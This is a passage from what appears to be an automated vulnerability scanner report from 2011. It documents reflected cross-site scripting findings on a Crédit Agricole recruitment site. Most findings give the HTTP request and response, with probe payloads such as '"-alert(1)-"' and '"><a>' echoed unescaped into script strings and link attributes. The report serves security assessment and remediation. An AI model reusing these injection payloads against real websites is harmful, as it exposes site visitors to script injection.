This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?11e10"><a>63ede3a82e2=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:05 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:05 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/?11e10"><a>63ede3a82e2=1" />
...[SNIP]...

1.10. http://www.mycreditagricole.jobs/ [version parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the version request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd5c"><a>364e4b69b9d was submitted in the version parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lang=uk&version=Textedbd5c"><a>364e4b69b9d HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/?lang=uk&version=Textedbd5c"><a>364e4b69b9d" />
...[SNIP]...

1.11. http://www.mycreditagricole.jobs/ [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac80a"-alert(1)-"c50d6fd9c1c was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?lang=uk&version=Texteac80a"-alert(1)-"c50d6fd9c1c HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:46 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:46 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
= "Recruitment and employment opportunities in banking, finance and insurance professions - Cr..dit Agricole Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/?lang=uk&version=Texteac80a"-alert(1)-"c50d6fd9c1c";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http://w
...[SNIP]...

1.12. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_asset_insurance_bank.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28915"-alert(1)-"234f00556cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_asset_insurance_bank.php?28915"-alert(1)-"234f00556cc=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Asset m
...[SNIP]...
et management, insurance and private banking - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_asset_insurance_bank.php?28915"-alert(1)-"234f00556cc=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.13. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_asset_insurance_bank.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98ed3"><a>087d9a50e0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_asset_insurance_bank.php?98ed3"><a>087d9a50e0a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:15 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:15 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Asset m
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_asset_insurance_bank.php?98ed3"><a>087d9a50e0a=1" />
...[SNIP]...

1.14. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_finance_invest.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7e63"-alert(1)-"ed1373b3f8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_finance_invest.php?c7e63"-alert(1)-"ed1373b3f8e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:48 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:48 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Financi
...[SNIP]...
aringBaseTitle = "Financing and investment banking - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_finance_invest.php?c7e63"-alert(1)-"ed1373b3f8e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.15. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_finance_invest.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5883"><a>f442009ed5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_finance_invest.php?c5883"><a>f442009ed5a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Financi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_finance_invest.php?c5883"><a>f442009ed5a=1" />
...[SNIP]...

1.16. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_france.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9244"><a>de696e96c49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_retailbank_france.php?a9244"><a>de696e96c49=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Regiona
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_retailbank_france.php?a9244"><a>de696e96c49=1" />
...[SNIP]...

1.17. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_france.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5998b"-alert(1)-"6a38dca8741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_retailbank_france.php?5998b"-alert(1)-"6a38dca8741=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:48 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:48 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Regiona
...[SNIP]...
gBaseTitle = "Regional retail banking in France - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_retailbank_france.php?5998b"-alert(1)-"6a38dca8741=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.18. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_inter.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c23"><a>8d5b94691b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_retailbank_inter.php?75c23"><a>8d5b94691b0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interna
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_retailbank_inter.php?75c23"><a>8d5b94691b0=1" />
...[SNIP]...

1.19. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_inter.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef380"-alert(1)-"b0c2e18007c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_retailbank_inter.php?ef380"-alert(1)-"b0c2e18007c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interna
...[SNIP]...
SharingBaseTitle = "International retail banking - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_retailbank_inter.php?ef380"-alert(1)-"b0c2e18007c=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.20. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_financial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4305a"-alert(1)-"0afbc4dcd29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_special_financial.php?4305a"-alert(1)-"0afbc4dcd29=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
ringBaseTitle = "Specialized financial services - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_special_financial.php?4305a"-alert(1)-"0afbc4dcd29=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.21. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_financial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328ce"><a>f6986c5c9a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_special_financial.php?328ce"><a>f6986c5c9a7=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_special_financial.php?328ce"><a>f6986c5c9a7=1" />
...[SNIP]...

1.22. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_subsidiaries.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29887"-alert(1)-"e438a8bc04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_special_subsidiaries.php?29887"-alert(1)-"e438a8bc04=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:56 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:56 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
e = "Specialized activities and subsidiaries - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_special_subsidiaries.php?29887"-alert(1)-"e438a8bc04=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.23. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_subsidiaries.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 565cf"><a>32b2bec6a15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_special_subsidiaries.php?565cf"><a>32b2bec6a15=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:31 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:31 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_special_subsidiaries.php?565cf"><a>32b2bec6a15=1" />
...[SNIP]...

1.24. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_support.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b501"-alert(1)-"3a62cc6ae5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_support.php?4b501"-alert(1)-"3a62cc6ae5b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Support
...[SNIP]...
itment Group";
var SharingBaseTitle = "Support functions - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_support.php?4b501"-alert(1)-"3a62cc6ae5b=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.25. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
